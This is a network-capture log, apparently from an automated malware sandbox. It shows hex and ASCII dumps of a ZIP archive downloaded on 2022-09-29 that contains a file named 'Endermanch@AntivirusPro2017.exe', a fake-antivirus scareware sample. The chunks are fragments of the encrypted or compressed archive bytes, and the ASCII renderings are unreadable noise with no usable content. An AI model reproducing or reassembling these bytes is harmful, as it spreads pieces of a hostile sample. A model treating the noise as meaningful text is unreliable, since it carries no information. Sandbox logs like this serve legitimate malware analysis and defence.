                                                                                                                                                2022-09-29 12:49:43 UTC9866INData Raw: 50 4b 03 04 14 00 01 00 08 00 cc 71 b9 46 6e c1 a3 ac 07 6a 0c 00 55 c0 0c 00 1f 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 72 6f 32 30 31 37 2e 65 78 65 25 07 aa cf 03 18 83 7f 90 f2 82 f4 4a c8 91 04 12 f4 c4 35 54 d1 11 fd 0b 95 82 b9 13 b7 bf ef ba 38 2e 1d 4b d8 08 b2 b2 43 b5 a3 c0 d7 77 ed 2b c1 26 7f 20 26 33 e5 c7 4d 54 26 f0 44 95 ed 24 60 75 a5 2f 65 d6 52 1e 72 1c ea 7f a8 b3 3d 44 30 b5 dc dc db 90 fe 82 c7 fd 4f 86 8d 27 85 b6 72 8e ae 12 2a ad b0 25 90 de 7a 75 d2 aa 99 19 f6 fd 5d 6e 54 90 91 de 62 38 63 db c3 14 35 94 7b 01 85 fb c5 24 57 65 48 4b 7c b8 4f 63 62 d8 e8 e9 04 68 da 36 23 dc 71 44 85 2a 59 00 ea 11 b8 97 f1 d7 5c 82 74 12 86 14 b2 3f 6d 49 f9 0b 3b d7 5f 0f 8d 62 6d f9 90 02 8f e6 1d e4 fc 16 80
                                                                                                                                                Data Ascii: PKqFnjUEndermanch@AntivirusPro2017.exe%J5T8.KCw+& &3MT&D$`u/eRr=D0O'r*%zu]nTb8c5{$WeHK|Ocbh6#qD*Y\t?mI;_bm
                                                                                                                                                2022-09-29 12:49:43 UTC9882INData Raw: 0c a8 6b 98 f1 a1 91 c8 1a 55 bd e3 04 b4 8c 7e dc 05 f1 fc 37 bd 0f 49 04 04 9a 68 f8 ff 85 17 40 01 d3 ae 96 f5 20 01 d3 62 1b c2 f7 15 1a 74 a9 51 12 52 eb 7b 3f 1f eb b4 ee 18 a6 b9 dd 37 b2 a6 be 18 46 b5 76 e5 67 46 31 71 52 9e b4 91 da 43 6a cf 36 75 85 a2 d1 05 68 fe 2c 97 61 eb 5c 18 96 d8 42 95 44 c6 f9 a2 a4 c8 b8 28 c4 3f 1c 75 17 77 c2 10 6d bd 21 03 bb ce b3 49 5d 2f ee 0e 78 58 e7 f9 ef 2a 88 ec ce c8 50 1b 5b 87 97 4d 2e f1 d6 0c f7 12 3d 1e 3f dd 83 ef 08 16 05 4c 65 ac a1 b7 2b 57 c7 47 06 41 d8 6d b7 d3 fb 78 80 b1 15 72 9d 14 94 f7 11 1e 36 31 42 9e 56 dd a7 b5 56 7b 10 da 9d c2 19 40 53 9f f5 ba e4 8c 9e 9c 88 75 eb d1 85 b9 c1 34 fd 54 e0 d1 30 f4 3f 2a 54 bb f0 94 1d d2 11 f8 f4 04 1c 77 b5 b7 47 0b 13 8b c2 a0 e0 79 50 9a 0d 94 d2
                                                                                                                                                Data Ascii: kU~7Ih@ btQR{?7FvgF1qRCj6uh,a\BD(?uwm!I]/xX*P[M.=?Le+WGAmxr61BVV{@Su4T0?*TwGyP
                                                                                                                                                2022-09-29 12:49:43 UTC9898INData Raw: 3d d6 53 78 bc 33 30 98 32 28 9f a6 46 63 95 16 a8 9a 64 e3 47 6e 97 cf c8 e1 59 d1 5a 59 df f8 6b ce 35 e5 73 7e f9 13 e5 b1 0f 71 f1 00 71 77 79 80 ea ff 7e 86 f8 10 fb c3 44 5b 11 44 b6 33 b0 2b bb 77 81 84 43 76 61 4e f2 55 4e c4 4b 2d 59 9b 34 5b d1 53 0d 11 7d 23 3c 71 65 7a b6 5d 8f 8b 91 6c 8f 55 eb e5 3d f2 a4 73 d0 13 1c 63 a1 4f b2 8b 07 0f c4 8f bb b5 ba 9d e0 66 1d b7 2e 1d e5 c6 96 fd 5a a0 49 30 0c 7c 23 a7 f2 08 4e 0f 13 a9 80 fc a3 c9 59 bf b5 8f dc c5 0e 73 ad 52 9b 99 c4 8a 47 e4 35 04 e4 f5 c4 0e 19 f6 e6 19 1f f5 9e 6e 82 7e c8 ed e3 b0 20 30 d0 42 d6 0f 2a b7 e1 d6 2b ae 13 bf 6f c8 af ea fa f7 6a 8c a3 ee 58 b2 8d 74 e9 63 91 18 ae c2 bd 98 fd 01 96 59 5a 89 62 57 93 81 0e 6b 33 e6 85 22 0e 22 fe 5a 17 83 83 b5 ff 08 58 c0 2d cb 23
                                                                                                                                                Data Ascii: =Sx302(FcdGnYZYk5s~qqwy~D[D3+wCvaNUNK-Y4[S}#<qez]lU=scOf.ZI0|#NYsRG5n~ 0B*+ojXtcYZbWk3""ZX-#
                                                                                                                                                2022-09-29 12:49:43 UTC9914INData Raw: 5d 01 89 14 43 87 ce cd 18 85 77 72 8f 59 09 39 1a e6 27 6d 83 61 fd 1a 38 cd 18 10 08 c8 60 1f 07 5c 62 e3 bc fc ef 52 67 74 fd a4 7d 30 8b 20 54 7d 32 5c 6d 6c ec d6 0e 61 2c 9e 84 35 19 30 20 55 08 92 da 68 2d bf 5d da f8 0e a6 5b c4 f4 b8 1a e0 d5 17 5d 49 a8 ab a6 23 fe ac 52 79 89 a7 2f bf 3c 4a be 77 4a d1 38 7e c2 67 79 b7 c5 9e 18 98 66 8f 1c 46 e0 52 77 04 63 4c 45 b8 75 b3 dd 5c 96 a9 eb 5b ef 36 00 eb 6e 8f ac a8 3c 2f 1b 87 f2 f3 b6 5b e2 bf 22 c2 90 fe 56 98 fa 92 8f e7 6d b2 fc 2f b8 ce c4 8f 04 62 6f 82 d2 fe 63 c4 04 3c d4 cd 7b 19 1b 7e dc 17 78 bd a9 27 47 6d f6 63 7e e4 09 49 68 18 cf 10 32 ec 59 e0 6c 3d 54 1b b9 91 f0 7f ee 4c a1 77 a6 03 ab 2e 32 91 fc f1 4a 63 df bf fd 0b a6 4a 5d cb 6b ac 13 5a 87 10 99 6d 0a 45 c6 7a 96 8f d6 9a
                                                                                                                                                Data Ascii: ]CwrY9'ma8`\bRgt}0 T}2\mla,50 Uh-][]I#Ry/<JwJ8~gyfFRwcLEu\[6n</["Vm/boc<{~x'Gmc~Ih2Yl=TLw.2JcJ]kZmEz
                                                                                                                                                2022-09-29 12:49:43 UTC9930INData Raw: 09 1a 02 46 3d eb ac 46 73 e4 83 c9 88 93 db cc f5 0c 49 3f 58 65 af b0 7e 4e 86 a0 5b d1 1c e7 fb 7c 8c 22 cf f0 1e f8 83 09 4d b9 09 ce 1e 3e 39 de 2a 57 3f 70 d0 08 39 88 f2 81 0c 60 29 a0 3a 0e 10 22 06 2b 2f a5 09 74 38 0e a6 94 75 0e d2 d5 41 80 3a 05 06 3a f9 a2 64 36 a6 ed 21 a7 ae c5 ce 27 75 a4 f0 5b 7e cf 5f 06 63 c8 44 ba 09 a8 cd 4f 3d ee d3 d0 60 6e a4 30 b1 14 b5 9c d7 20 00 bc 8f 43 4c 5a a4 81 df 9a 72 62 08 51 30 fb 5b 24 08 01 06 91 f0 7f 52 83 f3 44 7d 1b 75 73 b6 2a f2 ca f5 8f c9 55 b0 9a 47 05 8b ce b0 2e 6f 18 bd 62 db 60 a7 a4 51 cb 69 f2 79 31 30 8b 34 82 51 70 fb c1 4f 62 d2 d9 5d a2 e2 fe bd 48 b4 3f 04 eb 3f 33 ba d3 dd 2e f2 5a b9 ad 10 1e d9 0f 5c 5c d7 38 a0 c0 c4 36 dd 89 3b fe ee 1b 5a 2d 73 86 ff 3b de c7 bf 74 fd 96 36
                                                                                                                                                Data Ascii: F=FsI?Xe~N[|"M>9*W?p9`):"+/t8uA::d6!'u[~_cDO=`n0 CLZrbQ0[$RD}us*UG.ob`Qiy104QpOb]H??3.Z\\86;Z-s;t6
                                                                                                                                                2022-09-29 12:49:43 UTC9946INData Raw: 61 b7 59 77 fe 89 a1 56 15 eb 88 04 31 60 57 03 5f 2c 72 2b 12 a7 0c 8b 15 19 9d c9 fd 9d c0 84 83 fb 41 17 a9 a2 83 9a 06 4f 52 4d a2 11 a1 3a 49 10 40 b4 36 ab a2 77 18 8b 64 a9 4c 78 88 a2 0a 29 c5 bb 6e 6a 11 3c 98 39 e2 f9 52 c8 bf a5 d0 5c d2 1b ae fa a2 38 d4 fa a4 db ed c2 e7 2b b0 dc 63 75 21 ed 4b f0 63 5d 88 ec 6b 66 4a 62 1b 8d f6 04 4d 89 c9 dc f3 40 c4 55 dd f3 e2 28 18 f7 51 a5 48 85 29 67 82 14 69 1d 7e 07 f6 66 31 44 f4 f3 68 a4 67 17 e2 f9 a4 29 b6 d6 de 1b 75 5f d2 ab 7a 92 9f b9 57 c4 dc 48 a1 2d fd 20 36 db 2b 66 fa 07 76 28 e6 cd 53 3e c2 d1 02 da 57 d9 1e bb ef d6 e0 73 29 ae a2 ac 60 91 6f 40 1b 21 bd 62 7f 07 ae 0e 0e 83 76 3f bb 36 0d 39 64 21 86 dc 24 a3 ea cd 1c 8a 25 e7 a4 78 46 ae 2d f3 a4 74 7a 64 e2 7f 33 d5 ef 59 a0 7a 84
                                                                                                                                                Data Ascii: aYwV1`W_,r+AORM:I@6wdLx)nj<9R\8+cu!Kc]kfJbM@U(QH)gi~f1Dhg)u_zWH- 6+fv(S>Ws)`o@!bv?69d!$%xF-tzd3Yz
                                                                                                                                                2022-09-29 12:49:43 UTC9962INData Raw: d8 d0 01 93 d5 1a 6e e7 ca 5f 27 d5 22 d2 e1 86 46 48 bb 58 69 bd b4 a3 1c 2c 90 fa f5 87 3e 9d 1e dc 69 90 3c 20 1d 66 dc 3c ad 1c 5f df 2d 5e 61 2b e3 8c a9 d7 a5 5f 53 27 00 d4 fb cc ef e2 18 4b f4 24 3d 3c f1 43 d5 6d 17 39 c3 eb 56 5d 19 2a df f8 4a 2a bc 07 23 86 6e 81 34 c9 6c 43 20 7c b0 7a 90 31 fb 5b 4c 5c 34 09 28 de b6 d3 f3 0b f8 5c c8 fd 71 f8 34 36 fb d4 40 61 d5 a9 8f 38 89 42 e9 f8 f8 c4 16 85 a9 ea b5 34 3d 30 02 10 2d 13 73 82 71 e6 d8 73 d2 66 bf e6 46 a3 74 8c 5a ae 9d 57 70 c1 00 de 46 49 16 63 38 e6 bb 9b 7e fb b9 58 6d 26 75 6f 53 35 a4 9c 55 66 d3 7d 33 ea e6 36 d9 94 44 13 42 e0 95 41 67 86 20 8d 74 2d 3d 35 4f ed 26 7e 07 81 a2 ae 4b 32 f3 bd a2 45 5f a0 21 a9 bb 59 a5 85 93 bc 59 25 d3 fb 1b cb 35 d4 6b 3c 7d 12 b2 82 e2 cd 36
                                                                                                                                                Data Ascii: n_'"FHXi,>i< f<_-^a+_S'K$=<Cm9V]*J*#n4lC |z1[L\4(\q46@a8B4=0-sqsfFtZWpFIc8~Xm&uoS5Uf}36DBAg t-=5O&~K2E_!YY%5k<}6
                                                                                                                                                2022-09-29 12:49:43 UTC9978INData Raw: c0 43 93 39 fb 57 68 83 b1 8a 2d 5c 91 b9 3a d1 ed 2a a0 5b 7d d9 f6 12 66 83 fc fd 8d e0 51 40 ef 9d 3c 45 3e d1 91 9a cf fb 36 a6 1f c1 ff e0 f6 35 38 87 4e 92 93 73 57 46 97 7a b4 f4 9f f3 2d 2a b1 e7 9d 9e 9c 8b 94 f1 37 a7 72 6d 17 50 71 2b b0 fa 12 34 ed 1a 05 cf 3a e2 1d 69 b9 7e 38 2d 03 bb 59 18 4b 28 2c b2 f7 82 68 f8 d0 52 01 a8 c0 a2 e6 63 d9 dd 07 c4 66 ac c4 fb 14 ce 8e 0a f1 86 82 7a bb a4 aa 2d 7e d1 fa 2c d9 b3 51 ad 7e 9e 45 ba 71 11 92 1c a5 2d 9c 59 58 69 8a 03 b3 e6 d5 48 c1 e9 a4 26 7d 3f 16 4f ca 1f d2 f0 d4 1b 33 44 b5 fe fd 5c 2d a3 27 44 71 0d 66 62 68 d8 40 d7 cd 60 b3 e9 13 df 83 cb 21 76 4a 6b f6 a3 e8 a7 e9 d9 6e 75 aa 78 4f e0 de 33 c9 2d c9 56 63 48 dc e7 e2 1c 86 32 fd 3e 35 4e 53 f5 a3 e3 17 b3 cb 80 07 9e 0c bd 14 fc 6d
                                                                                                                                                Data Ascii: C9Wh-\:*[}fQ@<E>658NsWFz-*7rmPq+4:i~8-YK(,hRcfz-~,Q~Eq-YXiH&}?O3D\-'Dqfbh@`!vJknuxO3-VcH2>5NSm
                                                                                                                                                2022-09-29 12:49:43 UTC9994INData Raw: ea 81 b8 8e 2e 1e 58 75 2d a9 4e a1 c1 d8 31 ed 33 d7 69 1f 20 93 3e dd 2c 5f db 62 bf 40 20 1e 0e b7 31 11 70 41 3e 5e c0 5c 07 35 d4 bf 5f a7 2f e6 20 30 42 34 22 26 30 67 90 d3 c0 a5 8b 60 c4 8c 49 d7 13 db 5e 38 4a f4 f6 69 58 a8 08 b8 f1 f9 a8 07 e9 05 84 a0 e3 76 2e 3a 6a 74 86 fc 78 d3 4e c1 d3 17 de 20 81 1f 4d be 2b ef 5b 9a 6c 22 2e 6f 43 f2 e3 f7 cb 94 df ad d7 79 7c 77 06 84 5a f5 a2 01 ca e5 59 6d 21 0a fa 60 43 7b ea ba bc a7 09 9a 0e 35 53 7b 79 85 82 11 48 7a 07 df aa dc 13 d3 9a b7 48 47 b7 cf 59 73 af fa 54 9b cb 29 12 92 2d 11 ea 9b 8f fc ad 11 43 ca f4 d6 a9 6a 69 8f 2a 67 21 6a 46 09 3a f1 4f 88 ff bb 06 90 ba 06 e9 4b c9 06 d4 ac ba 4d 66 c0 cf 42 fa 7e 1f e5 54 61 5f 45 4f bd 6f 7f d7 83 7d cd ad 99 c8 6b f7 38 90 99 34 d4 dd 67 c2
                                                                                                                                                Data Ascii: .Xu-N13i >,_b@ 1pA>^\5_/ 0B4"&0g`I^8JiXv.:jtxN M+[l".oCy|wZYm!`C{5S{yHzHGYsT)-Cji*g!jF:OKMfB~Ta_EOo}k84g
                                                                                                                                                2022-09-29 12:49:43 UTC10010INData Raw: 70 ad 3d f7 78 8f 84 1d 2c c9 d4 aa 26 50 57 64 76 b4 f9 65 9b e2 90 d6 76 d2 aa 5c 08 56 ab 63 e2 96 63 96 a6 d2 68 27 8e 4e 8d 8c 3b 4d d3 36 eb d1 cc b4 4a 19 05 da 47 e6 0d 2c 5a 59 40 80 8d 53 c4 8d 94 69 81 4a d1 58 6b 5a dd 0b 8a 22 81 79 b6 53 24 57 ec 0e c0 32 72 56 95 2a b9 58 10 b9 3a a5 ed 6d cc 9f 56 7d 47 2e 0e 52 05 b8 d0 33 dc eb 97 45 32 da a5 a2 8a ae 14 cc 76 36 8b f6 41 f4 30 e2 bb c8 46 8e bc 0b f4 ae 6b d8 51 8b 04 e6 d6 53 5c 95 27 02 a7 c0 97 31 80 ba 6a d1 10 fd b0 eb 1a 26 29 cd 3f a6 a2 c0 ca fd 9a 77 d2 35 33 71 ab dd 36 1e c3 9c cf b2 ce 88 76 b5 5c b9 5f 0a 87 ae 7b f6 fa 59 f7 6a 4e 6d 27 3a f9 39 66 ce 01 69 f3 90 8c df 30 0c 1e eb 40 32 58 3f ef 9d a2 b1 64 98 38 82 9a 2a f4 dd a5 ba 74 2c 4a a4 fe 52 71 f1 d2 e3 ab 93 87
                                                                                                                                                Data Ascii: p=x,&PWdvev\Vcch'N;M6JG,ZY@SiJXkZ"yS$W2rV*X:mV}G.R3E2v6A0FkQS\'1j&)?w53q6v\_{YjNm':9fi0@2X?d8*t,JRq
                                                                                                                                                2022-09-29 12:49:43 UTC10026INData Raw: 3f 2d 31 20 f0 7f 6e 5b fd cf 3c e5 60 36 24 b7 c2 91 13 05 72 db 24 93 06 ed 92 3d c3 9f 65 8f 87 67 96 b5 45 54 95 b9 98 18 0a fc 56 31 0a db ca b6 5f 2e ff 93 46 f4 13 37 b2 3c e4 49 e3 0b 44 56 3c 48 42 44 4f 40 3f 03 92 e1 cd b0 18 96 9d 65 27 b1 d9 24 67 71 9b c6 5f 54 ea 34 9c 47 f6 c1 6d 23 eb eb 87 13 50 db fc 34 63 98 87 59 f2 9e b7 42 77 3a d5 07 53 2d 0b b6 9a 4f 99 e6 fa 4c 3e 12 bb 02 0d 4f 62 1e 94 52 be 6b 87 9c 87 fa 80 16 45 f4 4a 71 56 0a 91 38 e9 b5 34 5e fc e3 df e8 37 0b 8f ff bc ad 33 c1 ce d3 05 5c 2a 2b d8 3c b6 81 ce f1 87 63 a6 db fd 6a 7a ce 2e 27 0d 42 0e b0 5d da b2 58 e9 e5 da df 73 e4 44 4e d6 fe 29 f1 aa e5 04 94 67 5c 64 c6 56 4d 55 78 66 29 3e b1 fc 84 5b 8e b2 5a cd 1c 8c d3 ac c2 ff 09 82 c2 cc fb 37 3a e5 b3 b2 ae 03
                                                                                                                                                Data Ascii: ?-1 n[<`6$r$=egETV1_.F7<IDV<HBDO@?e'$gq_T4Gm#P4cYBw:S-OL>ObRkEJqV84^73\*+<cjz.'B]XsDN)g\dVMUxf)>[Z7:
                                                                                                                                                2022-09-29 12:49:43 UTC10042INData Raw: e4 7e 05 8f fe 35 2b db 4b 18 bc cf e4 01 73 20 b7 bc d9 a8 85 9e e8 7c 00 4f 03 5f ed 3f c0 a7 ee f4 82 a6 25 70 f4 0b 90 8b b1 6b b5 31 05 b8 2e 89 0a 49 7c f5 3d a0 c3 d7 e1 88 a6 9f 9c ab c9 a4 97 3d 83 69 f1 ce 02 5f a2 ac 2b 1b 0f 82 b8 63 be b6 8f 34 ec 20 91 46 1c 61 0d de 12 70 f0 3d 2e 70 7a 9d 54 9e e8 00 d3 8f d6 48 f4 55 60 57 91 83 f9 02 64 7f 62 12 5c d8 46 2b c6 ad 0f 31 4a 62 99 39 27 2b 97 7d 96 cb a5 e8 2d 12 9c 86 f1 bf f8 f8 f4 cb bf f7 f8 9f 7d d5 f4 19 55 a0 e9 2c ab 8a c1 3c c2 0a d0 c6 05 0f 2f f4 1b 58 06 d5 0b 67 49 c5 46 ff c8 16 43 79 43 0c 35 7e 09 6b 6e f4 81 a9 01 f4 44 a4 85 d8 c0 15 23 dd 87 0b 47 45 63 d4 8f 70 56 de 3d 94 03 0b 08 6a 2d de e7 1e c1 d1 55 86 9f ec ab 96 40 ba 55 31 e1 6c 1f 00 66 1f d2 dc f0 72 5e 5c fb
                                                                                                                                                Data Ascii: ~5+Ks |O_?%pk1.I|==i_+c4 Fap=.pzTHU`Wdb\F+1Jb9'+}-}U,</XgIFCyC5~knD#GEcpV=j-U@U1lfr^\
                                                                                                                                                2022-09-29 12:49:43 UTC10058INData Raw: a2 bd bb fc c1 b7 2a 2d 34 1d 41 fe 7f ff ee fc f1 2e 63 19 87 80 7c 80 d2 24 ef 52 3b e1 c8 8a 77 43 d0 ed d2 30 e4 43 8c 1d c9 ac 14 d2 0f bc 77 ce 5d 45 af 8f e2 be d4 8d e5 2b 78 da b4 6f e4 b4 31 bf d6 bd b4 8f bc 13 ef e8 80 aa 87 32 23 84 62 4d ab 08 b9 17 ac 13 37 89 8d ca 52 ed 87 34 6a 2f d4 27 ba df 61 0d 3b d7 eb 37 84 b2 26 24 09 98 9b d6 6d 2d 7b 8b 61 22 90 6b 18 93 1d e7 32 7d d9 39 4e 41 34 63 54 87 4d 8c bf aa 62 bd 81 df d5 2d 99 63 13 6d 25 25 94 5d f4 32 96 47 45 14 7d 3c 0e 2f ef 23 7e c4 91 ad ef 10 a6 2f 12 3b 37 11 92 3e c1 f7 ad 88 a8 6e fd da ec 69 8c 29 bc 45 b7 fb 62 07 d8 c4 38 dc 0a 18 9b 77 7b 35 69 50 de 7e 40 b9 06 0b 43 08 84 63 32 8c b5 f7 2c 38 aa 1d ae 18 e9 f3 34 65 0b 85 bb df 5a 91 5b 99 a7 d3 2f a9 41 fc 7c 04 df
                                                                                                                                                Data Ascii: *-4A.c|$R;wC0Cw]E+xo12#bM7R4j/'a;7&$m-{a"k2}9NA4cTMb-cm%%]2GE}</#~/;7>ni)Eb8w{5iP~@Cc2,84eZ[/A|
                                                                                                                                                2022-09-29 12:49:43 UTC10074INData Raw: 09 dd b0 03 d6 1f 87 9b 17 4e dd 45 c4 e6 c5 3f 1c 25 63 ed be 9e de e5 90 c1 d4 61 fb 4b 6b 44 b7 fa ff fb 26 ee 74 76 f9 17 0c 56 15 31 b8 f2 70 67 c7 86 9e f0 5f 33 a5 20 bc 44 d6 30 b5 2d 94 f7 4a 3d 9f a4 87 7d f4 d9 e3 bb 68 87 a9 c8 39 28 ca 92 54 ca 27 4a 40 4d 8d 87 b9 b0 ca 9a c9 25 1d a6 8b 8f 7f 49 5d df 64 e1 74 ba 2f c8 4e 5f c0 82 cc c4 8d 8e cb b4 91 3b 14 dd 5b e2 07 c4 51 1f e6 a3 81 4c 93 13 a4 bb d3 cf 10 a5 9f f1 b3 53 f3 6a 6f 9a 95 dc 0e 7a bc ee 58 14 43 ae 04 73 a9 dc 8d 0a a8 b6 72 3a 0e 22 ea 96 0f 61 f9 9f d5 ca a7 cb 83 d5 94 31 eb b4 c7 60 52 25 b8 44 f9 6c f8 97 1a fe 50 47 b5 9d 53 3a cd 76 04 a5 df 59 78 f6 b5 62 ee 1a 20 74 bc c5 3e e8 1b 47 53 74 f9 a0 7c d6 55 4c b2 e9 ad c9 3c 72 3b 78 f7 ac f2 72 18 2d f3 08 f1 62 29
                                                                                                                                                Data Ascii: NE?%caKkD&tvV1pg_3 D0-J=}h9(T'J@M%I]dt/N_;[QLSjozXCsr:"a1`R%DlPGS:vYxb t>GSt|UL<r;xr-b)
                                                                                                                                                2022-09-29 12:49:43 UTC10090INData Raw: 61 15 6a 0d 98 54 a7 f1 39 d7 9a e5 7e da 21 de 42 1b 7e 45 da 90 30 dd 88 4d b8 87 2b 8e 64 15 df 10 dd 1a be eb e4 84 a5 cf 51 21 37 6b 1c 80 ff c8 cd 95 3f bd 37 43 df c9 4d 42 d4 74 53 01 aa 38 0f d9 d1 09 cf e9 18 75 32 d2 22 e1 65 3b 51 43 d8 a1 7f fd 4d 0c 20 97 ad fe ce 53 a0 b3 dc b7 e7 23 47 94 79 fa b9 9e c4 27 ca 36 21 88 03 e7 8e 7d bd a5 6f 3f 56 7d eb 41 1c 5d 2c 9e 90 c4 93 80 61 bb 0d 79 ce b9 cd f1 65 2b 6a 23 c7 bd b9 16 a3 fc ee 96 1b 88 fc 2f 54 bf 4f e5 09 9e 66 e4 a7 e1 28 aa 3c 80 e0 2c 2f c4 6f 2b d5 fa fb 75 fe 82 32 40 db 19 11 c2 3e ed 20 8e 84 5a dc dc fa 52 30 1a e0 3c 90 04 21 8b 15 f9 fb d1 7b 56 a0 7e 80 f6 40 c5 55 50 17 9e cc fa 67 d5 89 11 ac 37 e6 f1 d0 5f 43 0b 68 0e 67 16 6e 1c 24 8d 0e 20 47 9d ed 8f c4 22 3d 0c aa
                                                                                                                                                Data Ascii: ajT9~!B~E0M+dQ!7k?7CMBtS8u2"e;QCM S#Gy'6!}o?V}A],aye+j#/TOf(<,/o+u2@> ZR0<!{V~@UPg7_Chgn$ G"=
                                                                                                                                                2022-09-29 12:49:43 UTC10106INData Raw: b8 30 24 f3 c9 a2 b9 ad 7f 0a 6b 81 3a 92 3a 09 33 e5 10 34 cf a8 ad ac 3d 94 cb b9 45 dd 3f 79 a7 59 68 fe 29 f3 32 a6 e8 5d 15 8f b1 f2 c5 50 b2 c3 c2 6a 81 fd 87 8f 2c 11 ba 6e 0d 5f 41 cf 7c 13 15 b7 25 89 1b d1 63 b5 9b 46 9f 24 ac 55 36 76 46 d2 a0 81 e9 3e 34 c2 c8 c4 92 1b 11 5d 63 e7 20 f0 40 53 5a 08 04 23 ec 5c 5a 41 59 6e 53 70 cc cc 66 58 89 8e 45 a0 59 1a 1a 36 72 8e c8 f7 52 5f b2 a3 a3 4c ba 02 41 1f 67 35 61 8e 29 dc f3 e8 dd a0 77 6e 01 df bd 14 cd 85 6a ec 59 40 44 21 03 d7 7f c8 69 d3 fa 65 7a 9f ea c3 d8 dd a7 02 25 c5 c7 a4 95 81 be 94 9d 7c 52 f0 cc 08 a4 8d 91 73 49 a1 97 3f b5 12 1c bc 9b f3 46 f1 11 16 a1 a3 1b 04 db b6 93 90 12 06 30 b9 cc 16 b4 a4 76 c4 40 99 c6 e7 c9 92 fe 0a b8 52 8f 4e d2 8e c9 4b 0c a0 05 7e ff 67 ba c8 a5
                                                                                                                                                Data Ascii: 0$k::34=E?yYh)2]Pj,n_A|%cF$U6vF>4]c @SZ#\ZAYnSpfXEY6rR_LAg5a)wnjY@D!iez%|RsI?F0v@RNK~g
                                                                                                                                                2022-09-29 12:49:43 UTC10116INData Raw: 39 90 95 a2 d0 bb b6 7d ff 70 88 b4 77 4e 7f e6 f6 1f 30 d7 07 da 8e 04 df d5 b4 7e b1 e4 c1 ff 25 d7 d1 8f 86 9d d9 8c 75 c1 ef 3e bd 89 b7 0e 3d 96 00 37 2d d9 d3 17 f9 26 b4 8f 1d 4f 8f d0 8c 33 07 70 2c 65 d6 70 a2 23 d5 e8 cf c0 35 a5 d6 e0 22 9b 39 7b 56 d8 7e 64 69 f6 c3 cc 03 29 d9 7c 69 e7 71 60 6e cb d6 7a c3 5d ae 6b d3 c4 03 a7 d9 4a 9f 2f a1 f7 f6 08 ba fe 4c d0 95 95 f5 c4 bb fd 4a 34 9e 03 39 42 71 a5 62 a8 06 05 18 74 53 71 d6 12 1b cb 5c 97 af a2 4b f9 c5 24 d9 6d 0f 64 fe 8f 25 2f 20 79 a7 ee 25 2a a1 78 35 7a 28 45 74 9f 3e ff 04 aa 94 09 4f 4a a3 89 c6 24 da 26 07 b4 43 c2 3d 44 f3 24 7d 2f e6 ae 9c 5f 2f 88 0e 44 d8 d3 90 e4 e4 06 a3 78 dd f3 2a 99 de fd 71 c6 f7 2f 07 8f 14 ad 1a b5 5d a5 1c 0d a6 c1 42 0f 3e b9 92 74 10 0e b1 4d a9
                                                                                                                                                Data Ascii: 9}pwN0~%u>=7-&O3p,ep#5"9{V~di)|iq`nz]kJ/LJ49BqbtSq\K$md%/ y%*x5z(Et>OJ$&C=D$}/_/Dx*q/]B>tM
                                                                                                                                                2022-09-29 12:49:43 UTC10132INData Raw: 8c cf 01 f9 1c 00 9c cf 81 a1 1b 3e c4 09 4a bf cb 7a 2e 92 99 bd 18 6e 4f db 70 95 0a a2 6e 55 a2 46 ba 07 a0 d5 6b 00 d3 03 59 ac e2 d2 d1 ff 67 84 b9 f2 86 6c 7b 02 e6 9b 7f c1 e4 35 45 c4 0d dd 3c 25 39 59 d3 ef 94 de 49 21 de e0 f6 fd ce 34 89 a4 bf 11 51 38 8b bf 0c a5 69 7b 2f 41 ba fc ef 5a 1b cd cf cd 89 7a 66 8d 85 82 7e 56 5d 47 b1 14 c6 ab 4a 49 df 3b 72 e0 31 ab 77 d1 bb 49 83 b9 47 7d b2 95 9e ad 4f 73 39 87 f7 91 63 7a f5 c9 c4 c9 88 63 e7 1e 2a 24 74 1d 57 f0 ad 94 80 38 b2 a2 a7 00 83 45 ef 18 d8 33 40 9f 94 f6 05 68 0c 78 20 19 73 50 55 43 39 e5 5d 69 7a 86 52 26 57 f0 a5 e5 9b b2 41 e8 80 f2 3c d6 9c f4 c8 7c a6 84 4c 04 8a fa 90 b9 cc 06 de 07 52 aa 7c a7 b8 e9 ec 21 5a 56 83 1f 39 2b 3e 7b b0 e2 c8 1e 29 c1 29 97 83 e8 1f 7c 41 92 66
                                                                                                                                                Data Ascii: >Jz.nOpnUFkYgl{5E<%9YI!4Q8i{/AZzf~V]GJI;r1wIG}Os9czc*$tW8E3@hx sPUC9]izR&WA<|LR|!ZV9+>{))|Af
                                                                                                                                                2022-09-29 12:49:43 UTC10148INData Raw: af 2d 59 24 e8 9e 34 5b 7f b0 30 a4 5e c4 fc f1 74 96 82 2f 7d 5c f1 9f 97 95 da 14 cd 1f ba 9a 69 c5 46 63 14 ed 06 cf 30 2e 18 04 9c c0 da ef b7 11 c2 2c 48 d5 f7 7c af 9a ce ef 1f a1 f1 0a db 0d fa ef 7a 65 9a f3 01 46 e2 57 d2 28 3f 53 55 28 29 82 db 2c d3 11 32 55 9d 6a 91 11 7b 08 da 5f b4 86 ee 0e bc 56 c9 17 69 62 f8 be 1c 41 05 a6 f1 45 70 d3 6f 3b 6f 81 1f 1a 4b b9 7f 23 1b bd 6b 20 a3 91 93 6e 10 b0 5d 0b 2a d3 33 07 f3 7e b1 ec e8 94 0d 52 ad 64 4a ff 91 22 00 8a 2f fc fd 56 91 42 c0 1c 4a cf 01 e5 78 29 96 01 c0 c6 02 b4 27 9a d5 fa 4c 8c 9d 39 dc 9f 4d 81 73 54 25 3b bb a2 0f c1 82 76 05 3b 16 d2 66 d5 35 32 ed 12 57 b2 2d e5 68 69 ef 26 66 59 03 bf dc 31 ac 20 5b ea 3c 4c 55 1e fb ce 9a 58 7c 8c ca eb 22 66 d2 8e 55 c4 ee cd 02 70 be fc 92
                                                                                                                                                Data Ascii: -Y$4[0^t/}\iFc0.,H|zeFW(?SU(),2Uj{_VibAEpo;oK#k n]*3~RdJ"/VBJx)'L9MsT%;v;f52W-hi&fY1 [<LUX|"fUp
